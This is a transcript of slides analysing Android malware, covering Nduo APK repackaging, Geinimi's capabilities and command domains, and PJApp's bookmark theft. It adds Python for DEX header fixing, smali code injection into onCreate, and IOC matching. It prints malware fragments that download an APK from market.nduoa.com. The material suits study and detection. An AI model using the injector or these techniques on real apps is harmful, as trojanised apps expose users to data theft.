Apk explorer2

Malware APK Explorer Series 2

Upload: feng-xiaoping

Post on 22-Nov-2014

Category: Documents

TRANSCRIPT

Page 1

Malware: APK Explorer Series 2

Page 2

Malware @ Android

Page 3

Nduo (N多)

Made by Nduo: the Nduo APK

Page 4

How it is done

• .apk: Unzip -> .dex
• .dex: Decompile (ApkTool[1], Dex2Jar[2]) -> .smali
• .smali: Modify (Smali[4])
• Repack (ApkTool) -> new.apk
• Re-sign before installing: the original signature no longer verifies once the APK has been repacked
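The first and last steps of this pipeline, as an added example that is not code from the slides: the script below unzips an APK, pulls out every classes*.dex and validates the DEX header fields (magic, Adler-32 checksum, SHA-1 signature, file_size, endian tag). The APK is constructed inline (a placeholder manifest and a header-only DEX) so it runs offline; on a real file call inspect_apk("target.apk"). Tools that rebuild the DEX from smali regenerate these fields for you; a hand-patched classes.dex must have them redone with fix_dex_header(), signature first and then checksum, because the checksum covers the signature.

```python
"""Added example, not from the slides: unzip an APK and check its DEX header.
The sample APK is constructed inline; on a real file call inspect_apk(path)."""
import hashlib
import io
import struct
import zipfile
import zlib

DEX_HEADER_SIZE = 0x70
DEX_ENDIAN_CONSTANT = 0x12345678


def dex_checksum(dex: bytes) -> int:
    """Adler-32 over everything after magic (8) + checksum (4), i.e. from offset 12."""
    return zlib.adler32(dex[12:]) & 0xFFFFFFFF


def dex_signature(dex: bytes) -> bytes:
    """SHA-1 over everything after magic + checksum + signature, i.e. from offset 32."""
    return hashlib.sha1(dex[32:]).digest()


def parse_dex_header(dex: bytes) -> dict:
    """Return the header fields plus a pass/fail flag for each integrity check."""
    if len(dex) < DEX_HEADER_SIZE or dex[:4] != b"dex\n" or dex[7] != 0:
        raise ValueError("not a DEX file (bad magic or truncated header)")
    checksum, = struct.unpack_from("<I", dex, 8)
    signature = dex[12:32]
    file_size, header_size, endian_tag = struct.unpack_from("<3I", dex, 32)
    map_off, = struct.unpack_from("<I", dex, 52)
    return {
        "version": dex[4:7].decode("ascii"),
        "file_size": file_size,
        "header_size": header_size,
        "map_off": map_off,
        "checksum_ok": checksum == dex_checksum(dex),
        "signature_ok": signature == dex_signature(dex),
        "file_size_ok": file_size == len(dex),
        "endian_ok": endian_tag == DEX_ENDIAN_CONSTANT,
    }


def fix_dex_header(dex: bytes) -> bytes:
    """Recompute file_size, then the signature, then the checksum (the checksum
    covers the signature, so the order matters). Required after any byte edit."""
    buf = bytearray(dex)
    struct.pack_into("<I", buf, 32, len(buf))
    buf[12:32] = dex_signature(bytes(buf))
    struct.pack_into("<I", buf, 8, dex_checksum(bytes(buf)))
    return bytes(buf)


def build_minimal_dex() -> bytes:
    """Constructed sample: a header plus a one-entry map list and no code.
    Enough to exercise the header checks; it is not a loadable DEX."""
    hdr = bytearray(DEX_HEADER_SIZE)
    hdr[0:8] = b"dex\n035\x00"
    struct.pack_into("<I", hdr, 36, DEX_HEADER_SIZE)      # header_size
    struct.pack_into("<I", hdr, 40, DEX_ENDIAN_CONSTANT)  # endian_tag
    struct.pack_into("<I", hdr, 52, DEX_HEADER_SIZE)      # map_off (map list follows header)
    # map_list: size=1, then map_item {type=0x0000 header_item, unused, size=1, offset=0}
    map_list = struct.pack("<I", 1) + struct.pack("<HHII", 0x0000, 0, 1, 0)
    return fix_dex_header(bytes(hdr) + map_list)


def build_sample_apk() -> bytes:
    """Constructed sample APK: a zip holding a placeholder manifest and classes.dex."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<placeholder/>")  # not real binary XML
        z.writestr("classes.dex", build_minimal_dex())
    return out.getvalue()


def inspect_apk(apk) -> dict:
    """Step 1 of the slide's pipeline: unzip and find every classes*.dex.
    Accepts a path, a file-like object or raw bytes; returns {entry: header report}."""
    if isinstance(apk, (bytes, bytearray)):
        apk = io.BytesIO(apk)
    report = {}
    with zipfile.ZipFile(apk) as z:
        for name in z.namelist():
            if name.startswith("classes") and name.endswith(".dex"):
                report[name] = parse_dex_header(z.read(name))
    return report


if __name__ == "__main__":
    for name, info in inspect_apk(build_sample_apk()).items():
        print(name, info)
```

Android verifies these header fields when it loads or optimises the DEX, so a patched classes.dex with stale values is rejected before any of the injected code runs; run parse_dex_header on the rebuilt file as a last check before signing.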

Page 5

Wet feet

AlertDialog Java code:

    AlertDialog alertDialog = new AlertDialog.Builder(this).create();
    alertDialog.setTitle("LALALA");
    alertDialog.setMessage("You should see me!!!!!!!");
    alertDialog.show();

Page 6

Wet feet cont.

AlertDialog op-code (smali; the #vN=(...) comments are register-type annotations emitted by the disassembler):

    new-instance v1, Landroid/app/AlertDialog$Builder;   #v1=(UninitRef);
    invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V   #v1=(Reference);
    invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog;
    move-result-object v0
    .local v0, alertDialog:Landroid/app/AlertDialog;   #v0=(Reference);
    const-string v1, "LALALA"
    invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
    const-string v1, "You should see me!!!!!!!"
    invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
    invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V

Page 7

Wet feet cont.

Yingyonghui Java code: SplashActivity.java

    .method public onCreate(Landroid/os/Bundle;)V
        .locals 12
        .parameter "savedInstanceState"

        .prologue
        const/16 v11, 0x400   #v11=(PosShort);
        const/4 v10, 0x0      #v10=(Null);
        const/4 v9, 0x1       #v9=(One);
        invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

AlertDialog op-code
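Slides 5 to 7 show the AlertDialog op-code being dropped into an existing onCreate. As an added example that is not code from the slides, the injector below does that splice programmatically and adds the checks a hand edit skips: it allocates two fresh registers above .locals instead of reusing v0/v1 (which may be live in the target method), refuses methods whose .locals would push the shifted p0/p1 past v15 (non-range invokes encode registers in 4 bits, and bumping .locals renumbers the parameters), and refuses methods that address parameters by v-number. SAMPLE_ONCREATE is a constructed method that mimics the Yingyonghui prologue on slide 7, not the real SplashActivity.

```python
"""Added example, not from the slides: splice the slide-6 AlertDialog smali
into an Activity.onCreate using fresh registers. SAMPLE_ONCREATE is constructed."""
import re

LOCALS_RE = re.compile(r"^(\s*)\.locals (\d+)\s*$")
METHOD_RE = re.compile(r"^\.method .*onCreate\(Landroid/os/Bundle;\)V\s*$")
SUPER_RE = re.compile(r"invoke-super \{p0, p1\}, L[^;]+;->onCreate\(Landroid/os/Bundle;\)V")
VREG_RE = re.compile(r"(?<![\w/])v(\d+)\b")        # vN outside type descriptors
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')        # blank out string literals before scanning
PARAM_REGS = 2          # onCreate(Bundle): p0 = this, p1 = savedInstanceState
MAX_NON_RANGE_REG = 15  # invoke-direct/virtual (non-range) encode registers in 4 bits


def alert_dialog_smali(vd, vb, title, message, indent):
    """The slide-6 sequence with v0 -> vd (dialog) and v1 -> vb (builder/scratch)."""
    for s in (title, message):
        if '"' in s or "\\" in s:
            raise ValueError("quote/backslash in string literal; escape it for smali first")
    seq = [
        f"new-instance v{vb}, Landroid/app/AlertDialog$Builder;",
        f"invoke-direct {{v{vb}, p0}}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V",
        f"invoke-virtual {{v{vb}}}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog;",
        f"move-result-object v{vd}",
        f'const-string v{vb}, "{title}"',
        f"invoke-virtual {{v{vd}, v{vb}}}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V",
        f'const-string v{vb}, "{message}"',
        f"invoke-virtual {{v{vd}, v{vb}}}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V",
        f"invoke-virtual {{v{vd}}}, Landroid/app/AlertDialog;->show()V",
    ]
    return [indent + line for line in seq]


def inject_alert(method_smali, title, message):
    """Return the method with the dialog code inserted right after invoke-super onCreate."""
    lines = method_smali.splitlines()
    if not lines or not METHOD_RE.match(lines[0]):
        raise ValueError("expected a .method ... onCreate(Landroid/os/Bundle;)V block")
    loc = next((i for i, l in enumerate(lines) if LOCALS_RE.match(l)), None)
    if loc is None:
        raise ValueError(".locals not found (convert .registers to .locals first)")
    indent, n = LOCALS_RE.match(lines[loc]).groups()
    n = int(n)
    vd, vb = n, n + 1   # two fresh locals; nothing in the original method touches them
    # Bumping .locals shifts p0/p1 to v(n+2), v(n+3); every non-range invoke in the
    # method (the original invoke-super included) still needs them below v16.
    if n + 2 + PARAM_REGS - 1 > MAX_NON_RANGE_REG:
        raise ValueError(f".locals {n} leaves no 4-bit registers; use /range forms or move")
    # A method that names a parameter by v-number (v12 for p0 here) would silently break.
    for l in lines[loc + 1:]:
        for r in VREG_RE.findall(STRING_RE.sub('""', l)):
            if int(r) >= n:
                raise ValueError(f"v{r} addresses a parameter by number; rewrite as pN first")
    sup = next((i for i, l in enumerate(lines) if SUPER_RE.search(l)), None)
    if sup is None:
        raise ValueError("no invoke-super onCreate; the Activity would not be initialised yet")
    lines[loc] = f"{indent}.locals {n + 2}"
    body_indent = re.match(r"\s*", lines[sup]).group(0)
    lines[sup + 1:sup + 1] = [""] + alert_dialog_smali(vd, vb, title, message, body_indent)
    return "\n".join(lines) + "\n"


# Constructed input mimicking the slide-7 prologue (v9..v11 are already in use).
SAMPLE_ONCREATE = """\
.method public onCreate(Landroid/os/Bundle;)V
    .locals 12
    .parameter "savedInstanceState"

    .prologue
    const/16 v11, 0x400
    const/4 v10, 0x0
    const/4 v9, 0x1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    return-void
.end method
"""

if __name__ == "__main__":
    print(inject_alert(SAMPLE_ONCREATE, "LALALA", "You should see me!!!!!!!"))
```

With .locals 12 the dialog lands in v12/v13 and the parameters move to v14/v15, which is the largest method this simple form can handle; for anything wider you would have to switch the invokes to their /range forms or move the parameters down, and the function refuses rather than emit code the assembler will reject.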

Page 8

Wet feet cont.

HideFile Java code: HideFiles.java

    getPackageInfo("com.nduoa.market", 0);

    ("使用N多市场, \n帮助维护「%s」的更新?", …)
    // "Use the Nduo market to help keep 「%s」 up to date?"

    localBuilder2.setPositiveButton("安装 ", locald);   // "Install"

    a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);

    i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");

The fragments look up the com.nduoa.market package, show a dialog asking the user to install the Nduo market, fetch nDuoaMarket.apk from market.nduoa.com, and pass an encoded string to i.a().

Page 9

Geinimi[6]

Page 10

Geinimi cont.

Domains:
www.widifu.com
www.udaore.com
www.frijd.com
www.islpast.com
www.piajesj.com
www.qoewsl.com
www.weolir.com
www.uisoa.com
www.riusdu.com
www.aiucr.com

IP addresses:
117.135.134.185
180.168.68.34

Geinimi capabilities:
• Access the user's geo-location based on coordinates given by the GPS
• Send or receive SMS messages
• Access the user's mailbox
• Read and modify the user's phonebook contacts
• Read and modify the user's browsing history
• Check running processes in memory
• Terminate legitimate running processes on the device
• Install shortcuts
• Perform web queries
• Change the wallpaper of the device

Device information collected:
Board, Brand, CPID, CPU ABI, Device, DID, Display, Fingerprint, Host, Line1 Number, Manufacturer, Model, Network Country ISO, Network Operator, Network Operator Name, Network Type, Phone Type, Product, PTID, SALESID, SDK version, Shell, SIM Country ISO, SIM Operator, SIM Operator Name, SIM Serial Number, SIM State, Software Version, Subscriber ID, Tags, Time, Type, User, Voice mail Number
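An added example that is not from the slides: the domains and IP addresses listed above turned into a matcher over DNS and connection log lines. The six log lines and their field layout (timestamp, client, record kind, then the query name or destination) are constructed for the example and are not a format the slides name. The matcher does a label-boundary suffix match, so api.qoewsl.com hits while notwidifu.com does not, and it strips a leading www. from the listed hosts so the whole zone is covered.

```python
"""Added example, not from the slides: match the Geinimi indicators on slide 10
against constructed DNS/connection log lines."""
import ipaddress

# Indicators exactly as listed on slide 10.
GEINIMI_DOMAINS = [
    "www.widifu.com", "www.udaore.com", "www.frijd.com", "www.islpast.com",
    "www.piajesj.com", "www.qoewsl.com", "www.weolir.com", "www.uisoa.com",
    "www.riusdu.com", "www.aiucr.com",
]
GEINIMI_IPS = ["117.135.134.185", "180.168.68.34"]


def normalize_host(host: str) -> str:
    """Lower-case, drop a trailing dot and a leading 'www.' so the zone itself matches."""
    host = host.strip().rstrip(".").lower()
    return host[4:] if host.startswith("www.") else host


DOMAIN_IOCS = {normalize_host(d) for d in GEINIMI_DOMAINS}
IP_IOCS = {ipaddress.ip_address(ip) for ip in GEINIMI_IPS}


def match_host(host: str):
    """Exact or subdomain match on a label boundary; returns the matched IOC or None."""
    h = normalize_host(host)
    for ioc in DOMAIN_IOCS:
        if h == ioc or h.endswith("." + ioc):
            return ioc
    return None


def match_ip(addr: str):
    """Match 'a.b.c.d' or 'a.b.c.d:port' (IPv4 only, as the IOCs are) against the IP list."""
    try:
        ip = ipaddress.ip_address(addr.rsplit(":", 1)[0])
    except ValueError:
        return None
    return str(ip) if ip in IP_IOCS else None


def scan_log(lines):
    """Return (line_no, client, indicator) for every DNS query or connection hitting an IOC.
    Assumed layout: '<timestamp> <client> DNS <rrtype> <qname>' or '<timestamp> <client> CONN <dst[:port]>'."""
    hits = []
    for no, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        client, kind = fields[1], fields[2]
        ind = None
        if kind == "DNS" and len(fields) >= 5:
            ind = match_host(fields[4])
        elif kind == "CONN":
            ind = match_ip(fields[3])
        if ind:
            hits.append((no, client, ind))
    return hits


# Constructed sample log: two infected clients, one clean lookup, one near-miss name.
SAMPLE_LOG = [
    "2011-01-05T10:00:01 10.0.0.12 DNS A www.widifu.com",
    "2011-01-05T10:00:02 10.0.0.12 DNS A cdn.example.net",
    "2011-01-05T10:00:03 10.0.0.12 CONN 117.135.134.185:8080",
    "2011-01-05T10:00:04 10.0.0.13 DNS A api.qoewsl.com",
    "2011-01-05T10:00:05 10.0.0.13 CONN 93.184.216.34:443",
    "2011-01-05T10:00:06 10.0.0.14 DNS A notwidifu.com",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```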

Page 11

PJApp 泡椒 [3][5]

"content://browser/bookmarks"

MEEGO91.COM

Channel activation (渠道激活): IMEI / SIM / IMSI / ICCID, Pdus ……

Default Browser: SEND ALL Bookmarks

ADD: android.paojiao.cn, ct2.paojiao.cn, g3g3.cn

Browser packages:
com.uc.browser
com.tencent.mtt
com.opera.mini.android
mobi.mgeek.TunnyBrowser
com.skyfire.browser
com.kolbysoft.steel
com.android.browser

Page 12

MEEGO91.COM whois:

Registrant:
nduo demi
nanchang jiangxi sic A501
nanchang, jiangxi 444001
China

Registered through: GoDaddy.com
Created on: 05-Sep-10
Expires on: 05-Sep-11

Administrative Contact:
demi, nduo [email protected]
nanchang jiangxi sic A501
nanchang, jiangxi 444001
China
+86.861363345678

Page 14

Questions?